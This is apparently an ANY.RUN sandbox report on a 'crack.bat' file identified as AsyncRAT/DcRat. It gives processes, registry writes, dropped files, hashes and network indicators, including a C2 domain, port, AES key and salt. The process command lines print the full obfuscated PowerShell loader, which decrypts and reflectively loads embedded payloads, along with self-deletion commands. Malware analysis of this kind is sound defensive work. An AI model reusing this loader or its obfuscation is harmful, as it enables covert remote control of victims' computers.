File name: crack.bat

Full analysis: https://app.any.run/tasks/2c61656e-0fe8-499f-935e-efa4ee49f086
Verdict: Malicious activity
Threats:

AsyncRAT is a RAT that can monitor and remotely control infected systems. It was published on GitHub as legitimate open-source remote administration software, but attackers use it for its many malicious capabilities.

Analysis date: January 19, 2024, 16:28:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
asyncrat
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5: F5D7FE4E2519887840C8AFB0969E2066
SHA1: FD54B06B8DD01E19C366088D0BCE6D4AAE83B75E
SHA256: 985A659EA23BB0E75A3F0A113BFEB19DA3F12C8C240ED5474FA6782F5A1E2721
SSDEEP: 1536:bmjnWtk1/AY5yVADRTKlV2lf1qWecN3Iwomqz5WrI2Dp:yjn43UyVepK7815l3lom7rI2t

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)
    • Drops the executable file immediately after the start

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)
    • ASYNCRAT has been detected (YARA)

      • PYlfK.bat.exe (PID: 1624)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2184)
      • wscript.exe (PID: 668)
    • Executing commands from a ".bat" file

      • cmd.exe (PID: 2184)
      • wscript.exe (PID: 668)
    • Application launched itself

      • cmd.exe (PID: 2184)
    • The executable file from the user directory is run by the CMD process

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)
    • Process drops legitimate windows executable

      • cmd.exe (PID: 1072)
      • cmd.exe (PID: 764)
    • Checks Windows Trust Settings

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Reads security settings of Internet Explorer

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Starts POWERSHELL.EXE for commands execution

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Reads the Internet Settings

      • crack.bat.exe (PID: 864)
      • wscript.exe (PID: 668)
      • PYlfK.bat.exe (PID: 1624)
    • The process executes VB scripts

      • crack.bat.exe (PID: 864)
    • Starts itself from another location

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 668)
    • Connects to unusual port

      • PYlfK.bat.exe (PID: 1624)
  • INFO

    • Checks supported languages

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Process checks Powershell version

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Reads the computer name

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Reads the machine GUID from the registry

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Create files in a temporary directory

      • crack.bat.exe (PID: 864)
      • PYlfK.bat.exe (PID: 1624)
    • Creates files or folders in the user directory

      • crack.bat.exe (PID: 864)
    • Manual execution by a user

      • explorer.exe (PID: 2328)

AsyncRat

(PID) Process: (1624) PYlfK.bat.exe
C2 (1): hicham157484.ddns.net
Ports (1): 1995
Botnet: DDNS
Version: 1.0.7 - modded by last
Options
AutoRun: false
Mutex: 585S6655454S5DF45645
InstallFolder: %AppData%
BSoD: false
AntiVM: false
Certificates
Cert1: MIICMDCCAZmgAwIBAgIVAK254qxL0D5CtQ8/3w+pi+LKorqRMA0GCSqGSIb3DQEBDQUAMGQxFTATBgNVBAMMDERjUmF0IFNlcnZlcjETMBEGA1UECwwKcXdxZGFuY2h1bjEcMBoGA1UECgwTRGNSYXQgQnkgcXdxZGFuY2h1bjELMAkGA1UEBwwCU0gxCzAJBgNVBAYTAkNOMB4XDTIyMDUzMTE2MjQyMFoXDTMzMDMwOTE2MjQyMFowEDEOMAwGA1UEAwwFRGNSYXQwgZ8wDQYJKoZIhvcNAQEBBQADgY0A...
Server_Signature: GkYP70fXw7CFQM88GsqeigCv69/V/JAvpAP9Q8tZMOT72y1FvjuCC30chptms5v4Y7uWn6PJzoKzDc510+epBd7Y86sa/N+8w75iohN/iuuGSP+5hXJLOOfhzVB1hCYTeZrAy+7z2+ZZrkFicGVhR0JwZcPeUhLAv1TOJLFNrNk=
Keys
AES: bdb9b2504d0f1b1dc813ce51bdd0fb902c44ce2e5b814733dd32871b28a43a53
Salt: DcRatByqwqdanchun
Total processes: 48
Monitored processes: 9
Malicious processes: 6
Suspicious processes: 0

Behavior graph

Processes in the graph: cmd.exe (no specs), cmd.exe, crack.bat.exe (no specs), powershell.exe (no specs), wscript.exe (no specs), cmd.exe, pylfk.bat.exe (#ASYNCRAT), powershell.exe (no specs), explorer.exe (no specs)

Process information

Fields per process: PID, CMD, Path, Indicators, Parent process
PID: 668
CMD: "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\PYlfK.vbs"
Path: C:\Windows\System32\wscript.exe
Parent process: crack.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
PID: 764
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Roaming\PYlfK.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 864
CMD: "C:\Users\admin\AppData\Local\Temp\crack.bat.exe" -w hidden -c $jzKo='MadXcoindXcoModdXcouldXcoedXco'.Replace('dXco', '');$eYtj='ChdXcoadXcondXcogdXcoeExdXcotendXcosidXcoondXco'.Replace('dXco', '');$dRkz='SpdXcolidXcotdXco'.Replace('dXco', '');$bVfn='TrdXcoandXcosfodXcordXcomFdXcoindXcoalBldXcoodXcockdXco'.Replace('dXco', '');$giLx='GetdXcoCudXcordXcordXcoedXcontPdXcorodXcocesdXcosdXco'.Replace('dXco', '');$webT='EntrdXcoyPoidXcontdXco'.Replace('dXco', '');$ffmv='ReadXcoddXcoLdXcoindXcoesdXco'.Replace('dXco', '');$PXRR='LoadXcoddXco'.Replace('dXco', '');$dKEd='InvdXcookdXcoedXco'.Replace('dXco', '');$sPZA='FirsdXcotdXco'.Replace('dXco', '');$cPVb='FrdXcoodXcomBasdXcoe6dXco4SdXcotridXcongdXco'.Replace('dXco', '');$vWWN='CrdXcoeadXcotdXcoeDdXcoecdXcorypdXcotodXcordXco'.Replace('dXco', '');function ytOKY($UgShh){$nQSSE=[System.Security.Cryptography.Aes]::Create();$nQSSE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nQSSE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nQSSE.Key=[System.Convert]::$cPVb('NMt3rNI/wp+nJ12Vs3HqHBKYTdy9XTgCh41mNLi87Mk=');$nQSSE.IV=[System.Convert]::$cPVb('LDO9q3lBzKERTmm9/mJCuA==');$TAQNr=$nQSSE.$vWWN();$tKckD=$TAQNr.$bVfn($UgShh,0,$UgShh.Length);$TAQNr.Dispose();$nQSSE.Dispose();$tKckD;}function ECarK($UgShh){$FPIye=New-Object System.IO.MemoryStream(,$UgShh);$nUUYR=New-Object System.IO.MemoryStream;$pgFfq=New-Object System.IO.Compression.GZipStream($FPIye,[IO.Compression.CompressionMode]::Decompress);$pgFfq.CopyTo($nUUYR);$pgFfq.Dispose();$FPIye.Dispose();$nUUYR.Dispose();$nUUYR.ToArray();}$iHlYj=[System.Linq.Enumerable]::$sPZA([System.IO.File]::$ffmv([System.IO.Path]::$eYtj([System.Diagnostics.Process]::$giLx().$jzKo.FileName, $null)));$qudXP=$iHlYj.Substring(3).$dRkz(':');$BCPpn=ECarK (ytOKY ([Convert]::$cPVb($qudXP[0])));$NcaBP=ECarK (ytOKY ([Convert]::$cPVb($qudXP[1])));[System.Reflection.Assembly]::$PXRR([byte[]]$NcaBP).$webT.$dKEd($null,$null);[System.Reflection.Assembly]::$PXRR([byte[]]$BCPpn).$webT.$dKEd($null,$null);
Path: C:\Users\admin\AppData\Local\Temp\crack.bat.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\local\temp\crack.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1072
CMD: C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\crack.bat"
Path: C:\Windows\System32\cmd.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 1624
CMD: "C:\Users\admin\AppData\Roaming\PYlfK.bat.exe" -w hidden -c $jzKo='MadXcoindXcoModdXcouldXcoedXco'.Replace('dXco', '');$eYtj='ChdXcoadXcondXcogdXcoeExdXcotendXcosidXcoondXco'.Replace('dXco', '');$dRkz='SpdXcolidXcotdXco'.Replace('dXco', '');$bVfn='TrdXcoandXcosfodXcordXcomFdXcoindXcoalBldXcoodXcockdXco'.Replace('dXco', '');$giLx='GetdXcoCudXcordXcordXcoedXcontPdXcorodXcocesdXcosdXco'.Replace('dXco', '');$webT='EntrdXcoyPoidXcontdXco'.Replace('dXco', '');$ffmv='ReadXcoddXcoLdXcoindXcoesdXco'.Replace('dXco', '');$PXRR='LoadXcoddXco'.Replace('dXco', '');$dKEd='InvdXcookdXcoedXco'.Replace('dXco', '');$sPZA='FirsdXcotdXco'.Replace('dXco', '');$cPVb='FrdXcoodXcomBasdXcoe6dXco4SdXcotridXcongdXco'.Replace('dXco', '');$vWWN='CrdXcoeadXcotdXcoeDdXcoecdXcorypdXcotodXcordXco'.Replace('dXco', '');function ytOKY($UgShh){$nQSSE=[System.Security.Cryptography.Aes]::Create();$nQSSE.Mode=[System.Security.Cryptography.CipherMode]::CBC;$nQSSE.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$nQSSE.Key=[System.Convert]::$cPVb('NMt3rNI/wp+nJ12Vs3HqHBKYTdy9XTgCh41mNLi87Mk=');$nQSSE.IV=[System.Convert]::$cPVb('LDO9q3lBzKERTmm9/mJCuA==');$TAQNr=$nQSSE.$vWWN();$tKckD=$TAQNr.$bVfn($UgShh,0,$UgShh.Length);$TAQNr.Dispose();$nQSSE.Dispose();$tKckD;}function ECarK($UgShh){$FPIye=New-Object System.IO.MemoryStream(,$UgShh);$nUUYR=New-Object System.IO.MemoryStream;$pgFfq=New-Object System.IO.Compression.GZipStream($FPIye,[IO.Compression.CompressionMode]::Decompress);$pgFfq.CopyTo($nUUYR);$pgFfq.Dispose();$FPIye.Dispose();$nUUYR.Dispose();$nUUYR.ToArray();}$iHlYj=[System.Linq.Enumerable]::$sPZA([System.IO.File]::$ffmv([System.IO.Path]::$eYtj([System.Diagnostics.Process]::$giLx().$jzKo.FileName, $null)));$qudXP=$iHlYj.Substring(3).$dRkz(':');$BCPpn=ECarK (ytOKY ([Convert]::$cPVb($qudXP[0])));$NcaBP=ECarK (ytOKY ([Convert]::$cPVb($qudXP[1])));[System.Reflection.Assembly]::$PXRR([byte[]]$NcaBP).$webT.$dKEd($null,$null);[System.Reflection.Assembly]::$PXRR([byte[]]$BCPpn).$webT.$dKEd($null,$null);
Path: C:\Users\admin\AppData\Roaming\PYlfK.bat.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\roaming\pylfk.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 1928
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(1624);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: PYlfK.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2016
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(864);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: crack.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
PID: 2184
CMD: C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\crack.bat" "
Path: C:\Windows\System32\cmd.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
PID: 2328
CMD: "C:\Windows\explorer.exe"
Path: C:\Windows\explorer.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Explorer
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
Total events: 4 379
Read events: 4 341
Write events: 38
Delete events: 0

Modification events

PID | Process | Key | Operation | Name | Value
864 | crack.bat.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
864 | crack.bat.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
864 | crack.bat.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
864 | crack.bat.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0
668 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
668 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
668 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | UNCAsIntranet | 1
668 | wscript.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | AutoDetect | 0
1624 | PYlfK.bat.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | ProxyBypass | 1
1624 | PYlfK.bat.exe | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap | write | IntranetName | 1
Executable files: 2
Suspicious files: 10
Text files: 2
Unknown types: 0

Dropped files

Fields per file: PID, Process, Filename, Type, MD5, SHA256

PID 864, crack.bat.exe: C:\Users\admin\AppData\Roaming\PYlfK.bat (text)
MD5: F5D7FE4E2519887840C8AFB0969E2066
SHA256: 985A659EA23BB0E75A3F0A113BFEB19DA3F12C8C240ED5474FA6782F5A1E2721
PID 864, crack.bat.exe: C:\Users\admin\AppData\Local\Temp\k3nna4ig.rtu.ps1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID 1624, PYlfK.bat.exe: C:\Users\admin\AppData\Local\Temp\pmbpekqh.2qg.ps1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID 1624, PYlfK.bat.exe: C:\Users\admin\AppData\Local\Temp\jbcla5d5.ipo.psm1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID 864, crack.bat.exe: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (binary)
MD5: 446DD1CF97EABA21CF14D03AEBC79F27
SHA256: A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
PID 1072, cmd.exe: C:\Users\admin\AppData\Local\Temp\crack.bat.exe (executable)
MD5: EB32C070E658937AA9FA9F3AE629B2B8
SHA256: 70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE
PID 864, crack.bat.exe: C:\Users\admin\AppData\Local\Temp\0lfomamd.5a3.psm1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID 2016, powershell.exe: C:\Users\admin\AppData\Local\Temp\xjoz1uem.zod.psm1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
PID 864, crack.bat.exe: C:\Users\admin\AppData\Roaming\PYlfK.vbs (text)
MD5: 7DACF695C618212681382A41847966BB
SHA256: 56F014108D30FA1C0656BDD7908461FDEC451A68B41F62151237B7CB61D98C5A
PID 1928, powershell.exe: C:\Users\admin\AppData\Local\Temp\solpenz1.kml.psm1 (binary)
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA256:
HTTP(S) requests: 0
TCP/UDP connections: 16
DNS requests: 6
Threats: 5

HTTP requests

No HTTP requests

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
1080 | svchost.exe | 224.0.0.252:5355 | - | - | - | unknown
1624 | PYlfK.bat.exe | 45.74.34.32:1995 | hicham157484.ddns.net | M247 Ltd | US | unknown

DNS requests

Domain | IP | Reputation
hicham157484.ddns.net | 45.74.34.32 | malicious
dns.msftncsi.com | 131.107.255.255 | shared

Threats

PID | Process | Class | Message
1080 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net
1080 | svchost.exe | Potentially Bad Traffic | ET POLICY DNS Query to DynDNS Domain *.ddns .net